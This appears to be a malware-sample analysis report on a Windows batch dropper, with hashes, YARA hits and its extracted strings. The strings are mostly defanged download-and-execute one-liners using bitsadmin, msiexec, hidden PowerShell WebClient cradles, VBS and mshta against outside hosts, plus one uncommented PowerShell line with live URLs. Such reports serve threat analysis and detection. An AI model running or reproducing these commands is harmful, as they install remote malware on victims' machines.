Sample details: 1cff7065348059660c3156713cd28cfe --

Hashes
MD5: 1cff7065348059660c3156713cd28cfe
SHA1: e2c15edfe99621250acc2303c7811f97b3670bd6
SHA256: fe6944761a9f67ebbd15fa3678a5dd21bbea5cdf0df465e7d961ca42a5b70b20
SSDEEP: 96:Amd/eSysNhUA9eicEfd/3ME++4+Dn+T+NXVM+i+FRfD53:AmdWQl9eeKEGsn2YX+3yfF3
Details
File Type: ASCII
Yara Hits
YRP/powershell | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/System_Tools | YRP/Browsers | YRP/Antivirus | YRP/Dropper_Strings | YRP/Misc_Suspicious_Strings | YRP/GEN_PowerShell | FlorianRoth/PowerShell_Susp_Parameter_Combo |
Strings
		REM IExplorer
REM cmd.exe /c "C:\Program Files (x86)\Internet Explorer\iexplore.exe" hxxp://example.com/
REM cmd.exe /c "C:\Program Files (x86)\Internet Explorer\iexplore.exe" hxxp://winwin-internatlonal.net/micking.exe 
REM Bitsadmin
REM cmd /c bitsadmin /transfer 8 /download hxxp://uwand.biz/wordpress/wp-admin/user/gm1.exe %temp%\Tf.exe&%temp%\gm1.exe
REM cmd.exe /c bitsadmin /transfer LR /priority foreground hxxp://internationalcon.com/assets/fonts/cpanel/slm.exe %USERPROFILE%\Rb.exe && start %USERPROFILE%\Rb.exe
REM cmd.exe /C bitsadmin /transfer NJukfvQyasbniCMxCYuuQhIMN /download hxxp://ahij.biz/Payment.exe %temp%\Name.exe && start %temp%\Name.exe
REM cmd.exe /c bitsadmin /transfer vd /priority foreground hxxp://185.227.83.56:4560/preest.exe %USERPROFILE%\D.exe && start %USERPROFILE%\D.exe, 0
REM cmd.exe /c bitsadmin /transfer xJ /priority foreground hxxp://185.227.83.56:4560/hop.exe %USERPROFILE%\xgQ.exe && start %USERPROFILE%\xgQ.exe
REM cmd.exe /c bitsadmin.exe /transfer b /download /priority high hxxps://tknk.io/ozBd C:\ProgramData\ZPYzOv.exe & powershell.exe Start-Process C:\ProgramData\ZPYzOv.exe
REM CMD.EXE /c @echo Set objShell = CreateObject("Wscript.Shell") > Rc.vbs & @echo objShell.Run "cmd /c bitsadmin /transfer 8 /download hxxp://service-id-63545645.co/PaymentAdvice.exe %temp%\Rc.exe&%temp%\Rc.exe",0,True >> Rc.vbs& Rc.vbs
REM cmd.exe /c bitsadmin /transfer CR /priority foreground hxxp://185.148.241.52:4560/cum.exe %USERPROFILE%\WQ.exe && start %USERPROFILE%\WQ.exe
REM misiexec.exe
REM cmd.exe & /C CD C: & msiexec.exe /i hxxp://www.girrajwadi.com/css/aksu.msi /quiet 
REM "C:\Windows\System32\msiexec.exe" /i hxxp://2toporaru.432.com1.ru/shadeslim.msi /quiet
REM "C:\Windows\System32\cmd.exe" C:\Windows\System32\msiexec.exe /i hxxp://profirst.com.vn/ta/build_output8b1683f.msi /quiet , 0
REM Powershell
REM powershell.exe -ep Bypass (New-Object System.Net.WebClient).DownloadFile('hxxp://chembay.co.in/BO.exe', 'C:\ProgramData\WAygONw.exe'); Start-Process('C:\ProgramData\WAygONw.exe')
REM powershell $a = $env:temp + '\eZRVomZtL.exe';WGet 'hxxp://10-a.odessa.one/xx/server.exe' -outFiLe $a;start $a
REM "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('hxxp://infothir.myhostpoint.ch/cab/mon.exe','C:\Users\admin\AppData\Local\Temp/excell.exe'); C:\Users\admin\AppData\Local\Temp/excell.exe
REM powershell "function nghjjq([string] $wlolqrp){(new-object system.net.webclient).downloadfile($wlolqrp,'C:\Users\admin\AppData\Local\Temp\ilmhx.exe');start-process 'C:\Users\admin\AppData\Local\Temp\ilmhx.exe';}try{nghjjq('hxxp://whitakerfamily.info/ico.ico')}catch{nghjjq('hxxp://rayanat.com/ico.ico')}
REM cmd /c powershell "'powershell ""function uxhtsvt([string] $etbove){(new-object system.net.webclient).downloadfile($etbove,''%tmp%\ymhjki.exe'');start-process ''%tmp%\ymhjki.exe'';}try{uxhtsvt(''hxxp://nrrgarment.com/flomtas.bin'')}catch{uxhtsvt(''hxxp://oasis-projects.com/flomtas.bin'')}'"" | out-file -encoding ascii -filepath %tmp%\sjlqwc.bat; start-process '%tmp%\sjlqwc.bat' -windowstyle hidden"
REM cmd /c powershell "'powershell ""function nghjjq([string] $wlolqrp){(new-object system.net.webclient).downloadfile($wlolqrp,''%tmp%\ilmhx.exe'');start-process ''%tmp%\ilmhx.exe'';}try{nghjjq(''hxxp://whitakerfamily.info/ico.ico'')}catch{nghjjq(''hxxp://rayanat.com/ico.ico'')}'"" | out-file -encoding ascii -filepath %tmp%\iorrwf.bat; start-process '%tmp%\iorrwf.bat' -windowstyle hidden"
REM cmd /c powershell "'powershell ""function nohhtasu([string] $bkvtjxvb){(new-object system.net.webclient).downloadfile($bkvtjxvb,''%tmp%\jnsbolhpq.exe'');start-process ''%tmp%\jnsbolhpq.exe'';}try{nohhtasu(''hxxp://lidsandjars.com/room.plo'')}catch{nohhtasu(''hxxp://velsun.in/room.plo'')}'"" | out-file -encoding ascii -filepath %tmp%\huuoy.bat; start-process '%tmp%\huuoy.bat' -windowstyle hidden"
REM cmd /c powershell "'powershell ""function nohhtasu([string] $bkvtjxvb){(new-object system.net.webclient).downloadfile($bkvtjxvb,''%tmp%\jnsbolhpqg.exe'');start-process ''%tmp%\jnsbolhpqg.exe'';}try{nohhtasu(''hxxp://myparamounthealthcare.com/bam.jop'')}catch{nohhtasu(''hxxp://logiviatech.com/bam.jop'')}'"" | out-file -encoding ascii -filepath %tmp%\uuoyw.bat; start-process '%tmp%\uuoyw.bat' -windowstyle hidden"
REM powershell.exe -NoP -NonI -W Hidden -Exec Bypass $down = New-Object System.Net.WebClient;$url = 'hxxps://a.coka.la/R1QGHZ.jpg';.$enV:temP\fttHtawYBACfZvy.exe. ; $down.DownloadFile($url,.$enV:temP\fttHtawYBACfZvy.exe. ); $exec = New-Object -com shell.application; $exec.shellexecute(.$enV:temP\fttHtawYBACfZvy.exe. ); exit;"
REM cmd /c powershell "'powershell ""function nohhtasu([string] $bkvtjxvb){(new-object system.net.webclient).downloadfile($bkvtjxvb,''%tmp%\jnsbolhpqg.exe'');start-process ''%tmp%\jnsbolhpqg.exe'';}try{nohhtasu(''hxxp://myparamounthealthcare.com/bam.jop'')}catch{nohhtasu(''hxxp://logiviatech.com/bam.jop'')}'"" | out-file -encoding ascii -filepath %tmp%\uuoyw.bat; start-process '%tmp%\uuoyw.bat' -windowstyle hidden"
cmd /c powershell "'powershell ""function nohhtasurb([string] $vtjxvb){(new-object system.net.webclient).downloadfile($vtjxvb,''%tmp%\jnsbolhpqghuu.exe'');start-process ''%tmp%\jnsbolhpqghuu.exe'';}try{nohhtasurb(''http://nrrgarment.com/korestros.ri'')}catch{nohhtasurb(''http://oasis-projects.com/korestros.ri'')}'"" | out-file -encoding ascii -filepath %tmp%\ywfrygndy.bat; start-process '%tmp%\ywfrygndy.bat' -windowstyle hidden"
REM VBscript
REM CMD.EXE /c @echo Set objShell = CreateObject("Wscript.Shell") > Fz.vbs & @echo objShell.Run "cmd /c bitsadmin /transfer 8 /download hxxp://www.mva.by/tags/swiftdetail.exe %temp%\Fz.exe&%temp%\Fz.exe",0,True >> Fz.vbs& Fz.vbs
REM CMD.EXE /c @echo Set objShell = CreateObject("Wscript.Shell") > Mj.vbs & @echo objShell.Run "cmd /c bitsadmin /transfer 8 /download hxxp://vpstinydev.gq/hot22.exe %temp%\Mj.exe&%temp%\Mj.exe",0,True >> Mj.vbs& Mj.vbs
REM MSHTA
REM "C:\Windows\System32\mshta.exe" hxxp://aitelong.top/amadi/bukkyhta.hta
REM command.exe